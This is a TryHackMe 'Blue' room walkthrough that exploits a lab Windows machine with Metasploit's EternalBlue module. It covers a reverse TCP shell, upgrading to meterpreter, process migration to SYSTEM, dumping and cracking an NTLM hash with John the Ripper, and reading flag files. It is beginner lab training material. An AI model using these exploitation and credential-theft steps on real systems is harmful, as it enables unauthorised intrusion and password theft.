Blue
This is my walkthrough for the TryHackMe Room: Blue.
Last updated
This is my walkthrough for the TryHackMe Room: Blue.
Last updated
The room can be found here. This is a pretty straight forward room, the hints and video will pretty much help anyone through it as that's what this room is meant for, to help beginners learn.
We'll scan the machine with Nmap first: sudo nmap -sS -sV -vv --script vuln -oA Blue 10.10.18.94
Looking through our scan results we can see:
We can find our answer pretty easily.
Our argument of --script vuln scanned the target for any known vulnerabilities, which returned:
showing the target is vulnerable to: ms17-010
With Metasploit up and loaded we search for ms17-010. search ms17-010
We can see a couple different modules but as this room is called "Blue" we can guess we're after the Eternal Blue module "exploit/windows/smb/ms17_010_eternalblue". Knowing that is the module we want we can type out "use exploit/windows/smb/ms17_010_eternalblue" OR use # as in the number next to the module. For me it's 0.
Usually when selecting a module it's good to run show options
to see what options are required to be set for this module to run. In this case, the only option that is not already set for us is the RHOST option, or our target. We set that with set rhosts 10.10.18.94
and can verify by running show options
again.
The room does specify one more thing before we exploit the target, it would like us to change the payload to "windows/x64/shell/reverse_tcp" by running set payload windows/x64/shell/reverse_tcp
.
With this payload option set, we can type run
or exploit
to get our shell on our target.
Background our newly obtained shell with CTRL+Z.
There's a few ways to obtain the answer to this question but rather than use google, we can do what we did before and search within metasploit. search shell_to_meterpreter
this should return post/multi/manage/shell_to_meterpreter
. So let select this module with use 0
As mentioned before, when selecting a module to use, it's usually good to run show options
to see what options are required to be set to run this module. Running this will show you we need to set the SESSION with set SESSION 1
.
Once that completes, reconnect back to the backgrounded session with sessions -i 2
and verify we are the SYSTEM by running getsystem
, we can also type shell
and run whoami
.
Now we want migrate to a different process that is running as SYSTEM, so lets background that shell again with CTRL+Z(Only do this IF we are in the shell and not in the meterpreter session.)
, and let's see whats other processes are running on this system by typing ps
. Once we find a process that is already being run from the NT AUTHORITY\SYSTEM
user, we want to take note of the PID, for example, conhost.exe, for me that PID is 2480. We can run migrate 2480
to then migrate over to that process.
This may or may not work for you so try different processes to migrate to.
From our meterpreter session, we can run hashdump to show us all the users and hashed passwords of the users on the system.
Once we copy Jons NTLM hash Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
. We can crack it for this we will use JohnTheRipper. I am running this from a personally setup VM so I have John installed into the /opt/ directory and will be using the classic rockyou.txt that I have stored inside SecLists password directory.
I have copied Jons hash to a file called jonhash in my current directory. So poninting JohnTheTipper at the hash and specifying the hash format and selecting the wordlist we want to use, we can attempt to crack the hash. sudo /opt/john/run/john jon --format=NT --wordlist=/opt/SecLists/Passwords/rockyou.txt
I ran search -f flag*.txt
from the meterpreter session and was able to locate the path to flags1 2 and 3. So you can then cat the file paths to obtains the flags as well:
cat c:\\flag1.txt
cat c:\\Windows\\System32\\config\\flag2.txt
cat c:\\Users\\Jon\\Documents\\flag3.txt